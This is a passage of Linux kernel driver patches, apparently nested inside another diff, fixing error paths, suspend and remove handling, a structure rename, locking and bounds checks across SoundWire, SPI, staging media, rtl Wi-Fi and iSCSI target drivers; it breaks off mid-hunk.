+diff --git a/drivers/soc/ti/pm33xx.c b/drivers/soc/ti/pm33xx.c
+index ce09c42eaed25..f04c21157904b 100644
+--- a/drivers/soc/ti/pm33xx.c
++++ b/drivers/soc/ti/pm33xx.c
+@@ -527,7 +527,7 @@ static int am33xx_pm_probe(struct platform_device *pdev)
+ 
+ 	ret = am33xx_pm_alloc_sram();
+ 	if (ret)
+-		return ret;
++		goto err_wkup_m3_ipc_put;
+ 
+ 	ret = am33xx_pm_rtc_setup();
+ 	if (ret)
+@@ -572,13 +572,14 @@ err_pm_runtime_put:
+ 	pm_runtime_put_sync(dev);
+ err_pm_runtime_disable:
+ 	pm_runtime_disable(dev);
+-	wkup_m3_ipc_put(m3_ipc);
+ err_unsetup_rtc:
+ 	iounmap(rtc_base_virt);
+ 	clk_put(rtc_fck);
+ err_free_sram:
+ 	am33xx_pm_free_sram();
+ 	pm33xx_dev = NULL;
++err_wkup_m3_ipc_put:
++	wkup_m3_ipc_put(m3_ipc);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/soundwire/cadence_master.c b/drivers/soundwire/cadence_master.c
+index e7da7d7b213fb..7286c9b3be691 100644
+--- a/drivers/soundwire/cadence_master.c
++++ b/drivers/soundwire/cadence_master.c
+@@ -1719,40 +1719,40 @@ int cdns_set_sdw_stream(struct snd_soc_dai *dai,
+ 			void *stream, int direction)
+ {
+ 	struct sdw_cdns *cdns = snd_soc_dai_get_drvdata(dai);
+-	struct sdw_cdns_dma_data *dma;
++	struct sdw_cdns_dai_runtime *dai_runtime;
+ 
+ 	if (stream) {
+ 		/* first paranoia check */
+ 		if (direction == SNDRV_PCM_STREAM_PLAYBACK)
+-			dma = dai->playback_dma_data;
++			dai_runtime = dai->playback_dma_data;
+ 		else
+-			dma = dai->capture_dma_data;
++			dai_runtime = dai->capture_dma_data;
+ 
+-		if (dma) {
++		if (dai_runtime) {
+ 			dev_err(dai->dev,
+-				"dma_data already allocated for dai %s\n",
++				"dai_runtime already allocated for dai %s\n",
+ 				dai->name);
+ 			return -EINVAL;
+ 		}
+ 
+-		/* allocate and set dma info */
+-		dma = kzalloc(sizeof(*dma), GFP_KERNEL);
+-		if (!dma)
++		/* allocate and set dai_runtime info */
++		dai_runtime = kzalloc(sizeof(*dai_runtime), GFP_KERNEL);
++		if (!dai_runtime)
+ 			return -ENOMEM;
+ 
+-		dma->stream_type = SDW_STREAM_PCM;
++		dai_runtime->stream_type = SDW_STREAM_PCM;
+ 
+-		dma->bus = &cdns->bus;
+-		dma->link_id = cdns->instance;
++		dai_runtime->bus = &cdns->bus;
++		dai_runtime->link_id = cdns->instance;
+ 
+-		dma->stream = stream;
++		dai_runtime->stream = stream;
+ 
+ 		if (direction == SNDRV_PCM_STREAM_PLAYBACK)
+-			dai->playback_dma_data = dma;
++			dai->playback_dma_data = dai_runtime;
+ 		else
+-			dai->capture_dma_data = dma;
++			dai->capture_dma_data = dai_runtime;
+ 	} else {
+-		/* for NULL stream we release allocated dma_data */
++		/* for NULL stream we release allocated dai_runtime */
+ 		if (direction == SNDRV_PCM_STREAM_PLAYBACK) {
+ 			kfree(dai->playback_dma_data);
+ 			dai->playback_dma_data = NULL;
+diff --git a/drivers/soundwire/cadence_master.h b/drivers/soundwire/cadence_master.h
+index 51e6ecc027cbc..fea3a90550d37 100644
+--- a/drivers/soundwire/cadence_master.h
++++ b/drivers/soundwire/cadence_master.h
+@@ -76,7 +76,7 @@ struct sdw_cdns_stream_config {
+ };
+ 
+ /**
+- * struct sdw_cdns_dma_data: Cadence DMA data
++ * struct sdw_cdns_dai_runtime: Cadence DAI runtime data
+  *
+  * @name: SoundWire stream name
+  * @stream: stream runtime
+@@ -84,18 +84,16 @@ struct sdw_cdns_stream_config {
+  * @bus: Bus handle
+  * @stream_type: Stream type
+  * @link_id: Master link id
+- * @hw_params: hw_params to be applied in .prepare step
+  * @suspended: status set when suspended, to be used in .prepare
+  * @paused: status set in .trigger, to be used in suspend
+  */
+-struct sdw_cdns_dma_data {
++struct sdw_cdns_dai_runtime {
+ 	char *name;
+ 	struct sdw_stream_runtime *stream;
+ 	struct sdw_cdns_pdi *pdi;
+ 	struct sdw_bus *bus;
+ 	enum sdw_stream_type stream_type;
+ 	int link_id;
+-	struct snd_pcm_hw_params *hw_params;
+ 	bool suspended;
+ 	bool paused;
+ };
+diff --git a/drivers/soundwire/intel.c b/drivers/soundwire/intel.c
+index 8c76541d553f1..89f8cab3f5141 100644
+--- a/drivers/soundwire/intel.c
++++ b/drivers/soundwire/intel.c
+@@ -824,15 +824,15 @@ static int intel_hw_params(struct snd_pcm_substream *substream,
+ {
+ 	struct sdw_cdns *cdns = snd_soc_dai_get_drvdata(dai);
+ 	struct sdw_intel *sdw = cdns_to_intel(cdns);
+-	struct sdw_cdns_dma_data *dma;
++	struct sdw_cdns_dai_runtime *dai_runtime;
+ 	struct sdw_cdns_pdi *pdi;
+ 	struct sdw_stream_config sconfig;
+ 	struct sdw_port_config *pconfig;
+ 	int ch, dir;
+ 	int ret;
+ 
+-	dma = snd_soc_dai_get_dma_data(dai, substream);
+-	if (!dma)
++	dai_runtime = snd_soc_dai_get_dma_data(dai, substream);
++	if (!dai_runtime)
+ 		return -EIO;
+ 
+ 	ch = params_channels(params);
+@@ -854,10 +854,9 @@ static int intel_hw_params(struct snd_pcm_substream *substream,
+ 	sdw_cdns_config_stream(cdns, ch, dir, pdi);
+ 
+ 	/* store pdi and hw_params, may be needed in prepare step */
+-	dma->paused = false;
+-	dma->suspended = false;
+-	dma->pdi = pdi;
+-	dma->hw_params = params;
++	dai_runtime->paused = false;
++	dai_runtime->suspended = false;
++	dai_runtime->pdi = pdi;
+ 
+ 	/* Inform DSP about PDI stream number */
+ 	ret = intel_params_stream(sdw, substream->stream, dai, params,
+@@ -869,7 +868,7 @@ static int intel_hw_params(struct snd_pcm_substream *substream,
+ 	sconfig.direction = dir;
+ 	sconfig.ch_count = ch;
+ 	sconfig.frame_rate = params_rate(params);
+-	sconfig.type = dma->stream_type;
++	sconfig.type = dai_runtime->stream_type;
+ 
+ 	sconfig.bps = snd_pcm_format_width(params_format(params));
+ 
+@@ -884,7 +883,7 @@ static int intel_hw_params(struct snd_pcm_substream *substream,
+ 	pconfig->ch_mask = (1 << ch) - 1;
+ 
+ 	ret = sdw_stream_add_master(&cdns->bus, &sconfig,
+-				    pconfig, 1, dma->stream);
++				    pconfig, 1, dai_runtime->stream);
+ 	if (ret)
+ 		dev_err(cdns->dev, "add master to stream failed:%d\n", ret);
+ 
+@@ -898,19 +897,24 @@ static int intel_prepare(struct snd_pcm_substream *substream,
+ {
+ 	struct sdw_cdns *cdns = snd_soc_dai_get_drvdata(dai);
+ 	struct sdw_intel *sdw = cdns_to_intel(cdns);
+-	struct sdw_cdns_dma_data *dma;
++	struct sdw_cdns_dai_runtime *dai_runtime;
+ 	int ch, dir;
+ 	int ret = 0;
+ 
+-	dma = snd_soc_dai_get_dma_data(dai, substream);
+-	if (!dma) {
+-		dev_err(dai->dev, "failed to get dma data in %s\n",
++	dai_runtime = snd_soc_dai_get_dma_data(dai, substream);
++	if (!dai_runtime) {
++		dev_err(dai->dev, "failed to get dai runtime in %s\n",
+ 			__func__);
+ 		return -EIO;
+ 	}
+ 
+-	if (dma->suspended) {
+-		dma->suspended = false;
++	if (dai_runtime->suspended) {
++		struct snd_soc_pcm_runtime *rtd = asoc_substream_to_rtd(substream);
++		struct snd_pcm_hw_params *hw_params;
++
++		hw_params = &rtd->dpcm[substream->stream].hw_params;
++
++		dai_runtime->suspended = false;
+ 
+ 		/*
+ 		 * .prepare() is called after system resume, where we
+@@ -921,21 +925,21 @@ static int intel_prepare(struct snd_pcm_substream *substream,
+ 		 */
+ 
+ 		/* configure stream */
+-		ch = params_channels(dma->hw_params);
++		ch = params_channels(hw_params);
+ 		if (substream->stream == SNDRV_PCM_STREAM_CAPTURE)
+ 			dir = SDW_DATA_DIR_RX;
+ 		else
+ 			dir = SDW_DATA_DIR_TX;
+ 
+-		intel_pdi_shim_configure(sdw, dma->pdi);
+-		intel_pdi_alh_configure(sdw, dma->pdi);
+-		sdw_cdns_config_stream(cdns, ch, dir, dma->pdi);
++		intel_pdi_shim_configure(sdw, dai_runtime->pdi);
++		intel_pdi_alh_configure(sdw, dai_runtime->pdi);
++		sdw_cdns_config_stream(cdns, ch, dir, dai_runtime->pdi);
+ 
+ 		/* Inform DSP about PDI stream number */
+ 		ret = intel_params_stream(sdw, substream->stream, dai,
+-					  dma->hw_params,
++					  hw_params,
+ 					  sdw->instance,
+-					  dma->pdi->intel_alh_id);
++					  dai_runtime->pdi->intel_alh_id);
+ 	}
+ 
+ 	return ret;
+@@ -946,11 +950,11 @@ intel_hw_free(struct snd_pcm_substream *substream, struct snd_soc_dai *dai)
+ {
+ 	struct sdw_cdns *cdns = snd_soc_dai_get_drvdata(dai);
+ 	struct sdw_intel *sdw = cdns_to_intel(cdns);
+-	struct sdw_cdns_dma_data *dma;
++	struct sdw_cdns_dai_runtime *dai_runtime;
+ 	int ret;
+ 
+-	dma = snd_soc_dai_get_dma_data(dai, substream);
+-	if (!dma)
++	dai_runtime = snd_soc_dai_get_dma_data(dai, substream);
++	if (!dai_runtime)
+ 		return -EIO;
+ 
+ 	/*
+@@ -959,10 +963,10 @@ intel_hw_free(struct snd_pcm_substream *substream, struct snd_soc_dai *dai)
+ 	 * DEPREPARED for the first cpu-dai and to RELEASED for the last
+ 	 * cpu-dai.
+ 	 */
+-	ret = sdw_stream_remove_master(&cdns->bus, dma->stream);
++	ret = sdw_stream_remove_master(&cdns->bus, dai_runtime->stream);
+ 	if (ret < 0) {
+ 		dev_err(dai->dev, "remove master from stream %s failed: %d\n",
+-			dma->stream->name, ret);
++			dai_runtime->stream->name, ret);
+ 		return ret;
+ 	}
+ 
+@@ -972,8 +976,7 @@ intel_hw_free(struct snd_pcm_substream *substream, struct snd_soc_dai *dai)
+ 		return ret;
+ 	}
+ 
+-	dma->hw_params = NULL;
+-	dma->pdi = NULL;
++	dai_runtime->pdi = NULL;
+ 
+ 	return 0;
+ }
+@@ -996,17 +999,17 @@ static int intel_pcm_set_sdw_stream(struct snd_soc_dai *dai,
+ static void *intel_get_sdw_stream(struct snd_soc_dai *dai,
+ 				  int direction)
+ {
+-	struct sdw_cdns_dma_data *dma;
++	struct sdw_cdns_dai_runtime *dai_runtime;
+ 
+ 	if (direction == SNDRV_PCM_STREAM_PLAYBACK)
+-		dma = dai->playback_dma_data;
++		dai_runtime = dai->playback_dma_data;
+ 	else
+-		dma = dai->capture_dma_data;
++		dai_runtime = dai->capture_dma_data;
+ 
+-	if (!dma)
++	if (!dai_runtime)
+ 		return ERR_PTR(-EINVAL);
+ 
+-	return dma->stream;
++	return dai_runtime->stream;
+ }
+ 
+ static int intel_trigger(struct snd_pcm_substream *substream, int cmd, struct snd_soc_dai *dai)
+@@ -1014,7 +1017,7 @@ static int intel_trigger(struct snd_pcm_substream *substream, int cmd, struct sn
+ 	struct sdw_cdns *cdns = snd_soc_dai_get_drvdata(dai);
+ 	struct sdw_intel *sdw = cdns_to_intel(cdns);
+ 	struct sdw_intel_link_res *res = sdw->link_res;
+-	struct sdw_cdns_dma_data *dma;
++	struct sdw_cdns_dai_runtime *dai_runtime;
+ 	int ret = 0;
+ 
+ 	/*
+@@ -1025,9 +1028,9 @@ static int intel_trigger(struct snd_pcm_substream *substream, int cmd, struct sn
+ 	if (res->ops && res->ops->trigger)
+ 		res->ops->trigger(dai, cmd, substream->stream);
+ 
+-	dma = snd_soc_dai_get_dma_data(dai, substream);
+-	if (!dma) {
+-		dev_err(dai->dev, "failed to get dma data in %s\n",
++	dai_runtime = snd_soc_dai_get_dma_data(dai, substream);
++	if (!dai_runtime) {
++		dev_err(dai->dev, "failed to get dai runtime in %s\n",
+ 			__func__);
+ 		return -EIO;
+ 	}
+@@ -1042,17 +1045,17 @@ static int intel_trigger(struct snd_pcm_substream *substream, int cmd, struct sn
+ 		 * the .trigger callback is used to track the suspend case only.
+ 		 */
+ 
+-		dma->suspended = true;
++		dai_runtime->suspended = true;
+ 
+ 		ret = intel_free_stream(sdw, substream->stream, dai, sdw->instance);
+ 		break;
+ 
+ 	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
+-		dma->paused = true;
++		dai_runtime->paused = true;
+ 		break;
+ 	case SNDRV_PCM_TRIGGER_STOP:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
+-		dma->paused = false;
++		dai_runtime->paused = false;
+ 		break;
+ 	default:
+ 		break;
+@@ -1091,25 +1094,25 @@ static int intel_component_dais_suspend(struct snd_soc_component *component)
+ 	for_each_component_dais(component, dai) {
+ 		struct sdw_cdns *cdns = snd_soc_dai_get_drvdata(dai);
+ 		struct sdw_intel *sdw = cdns_to_intel(cdns);
+-		struct sdw_cdns_dma_data *dma;
++		struct sdw_cdns_dai_runtime *dai_runtime;
+ 		int stream;
+ 		int ret;
+ 
+-		dma = dai->playback_dma_data;
++		dai_runtime = dai->playback_dma_data;
+ 		stream = SNDRV_PCM_STREAM_PLAYBACK;
+-		if (!dma) {
+-			dma = dai->capture_dma_data;
++		if (!dai_runtime) {
++			dai_runtime = dai->capture_dma_data;
+ 			stream = SNDRV_PCM_STREAM_CAPTURE;
+ 		}
+ 
+-		if (!dma)
++		if (!dai_runtime)
+ 			continue;
+ 
+-		if (dma->suspended)
++		if (dai_runtime->suspended)
+ 			continue;
+ 
+-		if (dma->paused) {
+-			dma->suspended = true;
++		if (dai_runtime->paused) {
++			dai_runtime->suspended = true;
+ 
+ 			ret = intel_free_stream(sdw, stream, dai, sdw->instance);
+ 			if (ret < 0)
+diff --git a/drivers/soundwire/qcom.c b/drivers/soundwire/qcom.c
+index cee2b22231410..866026185c669 100644
+--- a/drivers/soundwire/qcom.c
++++ b/drivers/soundwire/qcom.c
+@@ -696,7 +696,7 @@ static int qcom_swrm_init(struct qcom_swrm_ctrl *ctrl)
+ 
+ 	ctrl->reg_write(ctrl, SWRM_MCP_BUS_CTRL, SWRM_MCP_BUS_CLK_START);
+ 	/* Configure number of retries of a read/write cmd */
+-	if (ctrl->version > 0x01050001) {
++	if (ctrl->version >= 0x01050001) {
+ 		/* Only for versions >= 1.5.1 */
+ 		ctrl->reg_write(ctrl, SWRM_CMD_FIFO_CFG_ADDR,
+ 				SWRM_RD_WR_CMD_RETRIES |
+diff --git a/drivers/spi/atmel-quadspi.c b/drivers/spi/atmel-quadspi.c
+index 976a217e356d5..7e05b48dbd71c 100644
+--- a/drivers/spi/atmel-quadspi.c
++++ b/drivers/spi/atmel-quadspi.c
+@@ -672,18 +672,28 @@ static int atmel_qspi_remove(struct platform_device *pdev)
+ 	struct atmel_qspi *aq = spi_controller_get_devdata(ctrl);
+ 	int ret;
+ 
+-	ret = pm_runtime_resume_and_get(&pdev->dev);
+-	if (ret < 0)
+-		return ret;
+-
+ 	spi_unregister_controller(ctrl);
+-	atmel_qspi_write(QSPI_CR_QSPIDIS, aq, QSPI_CR);
++
++	ret = pm_runtime_get_sync(&pdev->dev);
++	if (ret >= 0) {
++		atmel_qspi_write(QSPI_CR_QSPIDIS, aq, QSPI_CR);
++		clk_disable(aq->qspick);
++		clk_disable(aq->pclk);
++	} else {
++		/*
++		 * atmel_qspi_runtime_{suspend,resume} just disable and enable
++		 * the two clks respectively. So after resume failed these are
++		 * off, and we skip hardware access and disabling these clks again.
++		 */
++		dev_warn(&pdev->dev, "Failed to resume device on remove\n");
++	}
++
++	clk_unprepare(aq->qspick);
++	clk_unprepare(aq->pclk);
+ 
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 
+-	clk_disable_unprepare(aq->qspick);
+-	clk_disable_unprepare(aq->pclk);
+ 	return 0;
+ }
+ 
+@@ -752,7 +762,11 @@ static int __maybe_unused atmel_qspi_runtime_resume(struct device *dev)
+ 	if (ret)
+ 		return ret;
+ 
+-	return clk_enable(aq->qspick);
++	ret = clk_enable(aq->qspick);
++	if (ret)
++		clk_disable(aq->pclk);
++
++	return ret;
+ }
+ 
+ static const struct dev_pm_ops __maybe_unused atmel_qspi_pm_ops = {
+diff --git a/drivers/spi/spi-cadence-quadspi.c b/drivers/spi/spi-cadence-quadspi.c
+index 4472305479452..30fd4bc90580e 100644
+--- a/drivers/spi/spi-cadence-quadspi.c
++++ b/drivers/spi/spi-cadence-quadspi.c
+@@ -1763,32 +1763,36 @@ static int cqspi_remove(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-#ifdef CONFIG_PM_SLEEP
+ static int cqspi_suspend(struct device *dev)
+ {
+ 	struct cqspi_st *cqspi = dev_get_drvdata(dev);
++	struct spi_master *master = dev_get_drvdata(dev);
++	int ret;
+ 
++	ret = spi_master_suspend(master);
+ 	cqspi_controller_enable(cqspi, 0);
+-	return 0;
++
++	clk_disable_unprepare(cqspi->clk);
++
++	return ret;
+ }
+ 
+ static int cqspi_resume(struct device *dev)
+ {
+ 	struct cqspi_st *cqspi = dev_get_drvdata(dev);
++	struct spi_master *master = dev_get_drvdata(dev);
+ 
+-	cqspi_controller_enable(cqspi, 1);
+-	return 0;
+-}
++	clk_prepare_enable(cqspi->clk);
++	cqspi_wait_idle(cqspi);
++	cqspi_controller_init(cqspi);
+ 
+-static const struct dev_pm_ops cqspi__dev_pm_ops = {
+-	.suspend = cqspi_suspend,
+-	.resume = cqspi_resume,
+-};
++	cqspi->current_cs = -1;
++	cqspi->sclk = 0;
++
++	return spi_master_resume(master);
++}
+ 
+-#define CQSPI_DEV_PM_OPS	(&cqspi__dev_pm_ops)
+-#else
+-#define CQSPI_DEV_PM_OPS	NULL
+-#endif
++static DEFINE_SIMPLE_DEV_PM_OPS(cqspi_dev_pm_ops, cqspi_suspend, cqspi_resume);
+ 
+ static const struct cqspi_driver_platdata cdns_qspi = {
+ 	.quirks = CQSPI_DISABLE_DAC_MODE,
+@@ -1855,7 +1859,7 @@ static struct platform_driver cqspi_platform_driver = {
+ 	.remove = cqspi_remove,
+ 	.driver = {
+ 		.name = CQSPI_NAME,
+-		.pm = CQSPI_DEV_PM_OPS,
++		.pm = &cqspi_dev_pm_ops,
+ 		.of_match_table = cqspi_dt_ids,
+ 	},
+ };
+diff --git a/drivers/spi/spi-fsl-spi.c b/drivers/spi/spi-fsl-spi.c
+index 93152144fd2ec..5602f052b2b50 100644
+--- a/drivers/spi/spi-fsl-spi.c
++++ b/drivers/spi/spi-fsl-spi.c
+@@ -181,8 +181,8 @@ static int mspi_apply_qe_mode_quirks(struct spi_mpc8xxx_cs *cs,
+ 				struct spi_device *spi,
+ 				int bits_per_word)
+ {
+-	/* QE uses Little Endian for words > 8
+-	 * so transform all words > 8 into 8 bits
++	/* CPM/QE uses Little Endian for words > 8
++	 * so transform 16 and 32 bits words into 8 bits
+ 	 * Unfortnatly that doesn't work for LSB so
+ 	 * reject these for now */
+ 	/* Note: 32 bits word, LSB works iff
+@@ -190,9 +190,11 @@ static int mspi_apply_qe_mode_quirks(struct spi_mpc8xxx_cs *cs,
+ 	if (spi->mode & SPI_LSB_FIRST &&
+ 	    bits_per_word > 8)
+ 		return -EINVAL;
+-	if (bits_per_word > 8)
++	if (bits_per_word <= 8)
++		return bits_per_word;
++	if (bits_per_word == 16 || bits_per_word == 32)
+ 		return 8; /* pretend its 8 bits */
+-	return bits_per_word;
++	return -EINVAL;
+ }
+ 
+ static int fsl_spi_setup_transfer(struct spi_device *spi,
+@@ -222,7 +224,7 @@ static int fsl_spi_setup_transfer(struct spi_device *spi,
+ 		bits_per_word = mspi_apply_cpu_mode_quirks(cs, spi,
+ 							   mpc8xxx_spi,
+ 							   bits_per_word);
+-	else if (mpc8xxx_spi->flags & SPI_QE)
++	else
+ 		bits_per_word = mspi_apply_qe_mode_quirks(cs, spi,
+ 							  bits_per_word);
+ 
+diff --git a/drivers/spi/spi-imx.c b/drivers/spi/spi-imx.c
+index d209930069cf3..fbd7b354dd36b 100644
+--- a/drivers/spi/spi-imx.c
++++ b/drivers/spi/spi-imx.c
+@@ -1864,13 +1864,11 @@ static int spi_imx_remove(struct platform_device *pdev)
+ 
+ 	spi_unregister_controller(controller);
+ 
+-	ret = pm_runtime_resume_and_get(spi_imx->dev);
+-	if (ret < 0) {
+-		dev_err(spi_imx->dev, "failed to enable clock\n");
+-		return ret;
+-	}
+-
+-	writel(0, spi_imx->base + MXC_CSPICTRL);
++	ret = pm_runtime_get_sync(spi_imx->dev);
++	if (ret >= 0)
++		writel(0, spi_imx->base + MXC_CSPICTRL);
++	else
++		dev_warn(spi_imx->dev, "failed to enable clock, skip hw disable\n");
+ 
+ 	pm_runtime_dont_use_autosuspend(spi_imx->dev);
+ 	pm_runtime_put_sync(spi_imx->dev);
+diff --git a/drivers/spi/spi-qup.c b/drivers/spi/spi-qup.c
+index 678dc51ef0174..205e54f157b4a 100644
+--- a/drivers/spi/spi-qup.c
++++ b/drivers/spi/spi-qup.c
+@@ -1277,18 +1277,22 @@ static int spi_qup_remove(struct platform_device *pdev)
+ 	struct spi_qup *controller = spi_master_get_devdata(master);
+ 	int ret;
+ 
+-	ret = pm_runtime_resume_and_get(&pdev->dev);
+-	if (ret < 0)
+-		return ret;
++	ret = pm_runtime_get_sync(&pdev->dev);
+ 
+-	ret = spi_qup_set_state(controller, QUP_STATE_RESET);
+-	if (ret)
+-		return ret;
++	if (ret >= 0) {
++		ret = spi_qup_set_state(controller, QUP_STATE_RESET);
++		if (ret)
++			dev_warn(&pdev->dev, "failed to reset controller (%pe)\n",
++				 ERR_PTR(ret));
+ 
+-	spi_qup_release_dma(master);
++		clk_disable_unprepare(controller->cclk);
++		clk_disable_unprepare(controller->iclk);
++	} else {
++		dev_warn(&pdev->dev, "failed to resume, skip hw disable (%pe)\n",
++			 ERR_PTR(ret));
++	}
+ 
+-	clk_disable_unprepare(controller->cclk);
+-	clk_disable_unprepare(controller->iclk);
++	spi_qup_release_dma(master);
+ 
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+diff --git a/drivers/spmi/spmi.c b/drivers/spmi/spmi.c
+index 55381592bb5a6..e73d3017863cb 100644
+--- a/drivers/spmi/spmi.c
++++ b/drivers/spmi/spmi.c
+@@ -350,7 +350,8 @@ static void spmi_drv_remove(struct device *dev)
+ 	const struct spmi_driver *sdrv = to_spmi_driver(dev->driver);
+ 
+ 	pm_runtime_get_sync(dev);
+-	sdrv->remove(to_spmi_device(dev));
++	if (sdrv->remove)
++		sdrv->remove(to_spmi_device(dev));
+ 	pm_runtime_put_noidle(dev);
+ 
+ 	pm_runtime_disable(dev);
+diff --git a/drivers/staging/iio/resolver/ad2s1210.c b/drivers/staging/iio/resolver/ad2s1210.c
+index e4cf42438487d..636c45b128438 100644
+--- a/drivers/staging/iio/resolver/ad2s1210.c
++++ b/drivers/staging/iio/resolver/ad2s1210.c
+@@ -101,7 +101,7 @@ struct ad2s1210_state {
+ static const int ad2s1210_mode_vals[4][2] = {
+ 	[MOD_POS] = { 0, 0 },
+ 	[MOD_VEL] = { 0, 1 },
+-	[MOD_CONFIG] = { 1, 0 },
++	[MOD_CONFIG] = { 1, 1 },
+ };
+ 
+ static inline void ad2s1210_set_mode(enum ad2s1210_mode mode,
+diff --git a/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c b/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c
+index 0bf513c26b6b5..a5c5bebad3061 100644
+--- a/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c
++++ b/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c
+@@ -823,10 +823,10 @@ static int write_ts_to_decoder(struct av7110 *av7110, int type, const u8 *buf, s
+ 		av7110_ipack_flush(ipack);
+ 
+ 	if (buf[3] & ADAPT_FIELD) {
++		if (buf[4] > len - 1 - 4)
++			return 0;
+ 		len -= buf[4] + 1;
+ 		buf += buf[4] + 1;
+-		if (!len)
+-			return 0;
+ 	}
+ 
+ 	av7110_ipack_instant_repack(buf + 4, len - 4, ipack);
+diff --git a/drivers/staging/media/rkvdec/rkvdec.c b/drivers/staging/media/rkvdec/rkvdec.c
+index 7bab7586918c1..82806f198074a 100644
+--- a/drivers/staging/media/rkvdec/rkvdec.c
++++ b/drivers/staging/media/rkvdec/rkvdec.c
+@@ -1066,6 +1066,8 @@ static int rkvdec_remove(struct platform_device *pdev)
+ {
+ 	struct rkvdec_dev *rkvdec = platform_get_drvdata(pdev);
+ 
++	cancel_delayed_work_sync(&rkvdec->watchdog_work);
++
+ 	rkvdec_v4l2_cleanup(rkvdec);
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_dont_use_autosuspend(&pdev->dev);
+diff --git a/drivers/staging/media/sunxi/cedrus/cedrus.c b/drivers/staging/media/sunxi/cedrus/cedrus.c
+index 55c54dfdc585c..d2419319afd72 100644
+--- a/drivers/staging/media/sunxi/cedrus/cedrus.c
++++ b/drivers/staging/media/sunxi/cedrus/cedrus.c
+@@ -541,6 +541,7 @@ static int cedrus_remove(struct platform_device *pdev)
+ {
+ 	struct cedrus_dev *dev = platform_get_drvdata(pdev);
+ 
++	cancel_delayed_work_sync(&dev->watchdog_work);
+ 	if (media_devnode_is_registered(dev->mdev.devnode)) {
+ 		media_device_unregister(&dev->mdev);
+ 		v4l2_m2m_unregister_media_controller(dev->m2m_dev);
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+index 89bc989cffbae..c1e50084172d8 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+@@ -717,6 +717,7 @@ static int _rtl92e_sta_up(struct net_device *dev, bool is_silent_reset)
+ 	else
+ 		netif_wake_queue(dev);
+ 
++	priv->bfirst_after_down = false;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/staging/rtl8723bs/core/rtw_mlme.c b/drivers/staging/rtl8723bs/core/rtw_mlme.c
+index 6498fd17e1d3e..8159bb651c445 100644
+--- a/drivers/staging/rtl8723bs/core/rtw_mlme.c
++++ b/drivers/staging/rtl8723bs/core/rtw_mlme.c
+@@ -1549,7 +1549,7 @@ void _rtw_join_timeout_handler(struct timer_list *t)
+ 	if (adapter->bDriverStopped || adapter->bSurpriseRemoved)
+ 		return;
+ 
+-	spin_lock_irq(&pmlmepriv->lock);
++	spin_lock_bh(&pmlmepriv->lock);
+ 
+ 	if (rtw_to_roam(adapter) > 0) { /* join timeout caused by roaming */
+ 		while (1) {
+@@ -1577,7 +1577,7 @@ void _rtw_join_timeout_handler(struct timer_list *t)
+ 
+ 	}
+ 
+-	spin_unlock_irq(&pmlmepriv->lock);
++	spin_unlock_bh(&pmlmepriv->lock);
+ }
+ 
+ /*
+@@ -1590,11 +1590,11 @@ void rtw_scan_timeout_handler(struct timer_list *t)
+ 						  mlmepriv.scan_to_timer);
+ 	struct	mlme_priv *pmlmepriv = &adapter->mlmepriv;
+ 
+-	spin_lock_irq(&pmlmepriv->lock);
++	spin_lock_bh(&pmlmepriv->lock);
+ 
+ 	_clr_fwstate_(pmlmepriv, _FW_UNDER_SURVEY);
+ 
+-	spin_unlock_irq(&pmlmepriv->lock);
++	spin_unlock_bh(&pmlmepriv->lock);
+ 
+ 	rtw_indicate_scan_done(adapter, true);
+ }
+diff --git a/drivers/target/iscsi/iscsi_target.c b/drivers/target/iscsi/iscsi_target.c
+index baf4da7bb3b4e..3f7a9f7f5f4e3 100644
+--- a/drivers/target/iscsi/iscsi_target.c
++++ b/drivers/target/iscsi/iscsi_target.c
+@@ -1190,9 +1190,10 @@ int iscsit_setup_scsi_cmd(struct iscsit_conn *conn, struct iscsit_cmd *cmd,
+ 	 * Initialize struct se_cmd descriptor from target_core_mod infrastructure
+ 	 */
+ 	__target_init_cmd(&cmd->se_cmd, &iscsi_ops,
+-			 conn->sess->se_sess, be32_to_cpu(hdr->data_length),
+-			 cmd->data_direction, sam_task_attr,
+-			 cmd->sense_buffer + 2, scsilun_to_int(&hdr->lun));
++			  conn->sess->se_sess, be32_to_cpu(hdr->data_length),
++			  cmd->data_direction, sam_task_attr,
++			  cmd->sense_buffer + 2, scsilun_to_int(&hdr->lun),
++			  conn->cmd_cnt);
+ 
+ 	pr_debug("Got SCSI Command, ITT: 0x%08x, CmdSN: 0x%08x,"
+ 		" ExpXferLen: %u, Length: %u, CID: %hu\n", hdr->itt,
+@@ -2055,7 +2056,8 @@ iscsit_handle_task_mgt_cmd(struct iscsit_conn *conn, struct iscsit_cmd *cmd,
+ 	__target_init_cmd(&cmd->se_cmd, &iscsi_ops,
+ 			  conn->sess->se_sess, 0, DMA_NONE,
+ 			  TCM_SIMPLE_TAG, cmd->sense_buffer + 2,
+-			  scsilun_to_int(&hdr->lun));
++			  scsilun_to_int(&hdr->lun),
++			  conn->cmd_cnt);
+ 
+ 	target_get_sess_cmd(&cmd->se_cmd, true);
+ 
+@@ -4218,9 +4220,12 @@ static void iscsit_release_commands_from_conn(struct iscsit_conn *conn)
+ 	list_for_each_entry_safe(cmd, cmd_tmp, &tmp_list, i_conn_node) {
+ 		struct se_cmd *se_cmd = &cmd->se_cmd;
+ 
+-		if (se_cmd->se_tfo != NULL) {
+-			spin_lock_irq(&se_cmd->t_state_lock);
+-			if (se_cmd->transport_state & CMD_T_ABORTED) {
++		if (!se_cmd->se_tfo)
++			continue;
++
++		spin_lock_irq(&se_cmd->t_state_lock);
++		if (se_cmd->transport_state & CMD_T_ABORTED) {
++			if (!(se_cmd->transport_state & CMD_T_TAS))
+ 				/*
+ 				 * LIO's abort path owns the cleanup for this,
+ 				 * so put it back on the list and let
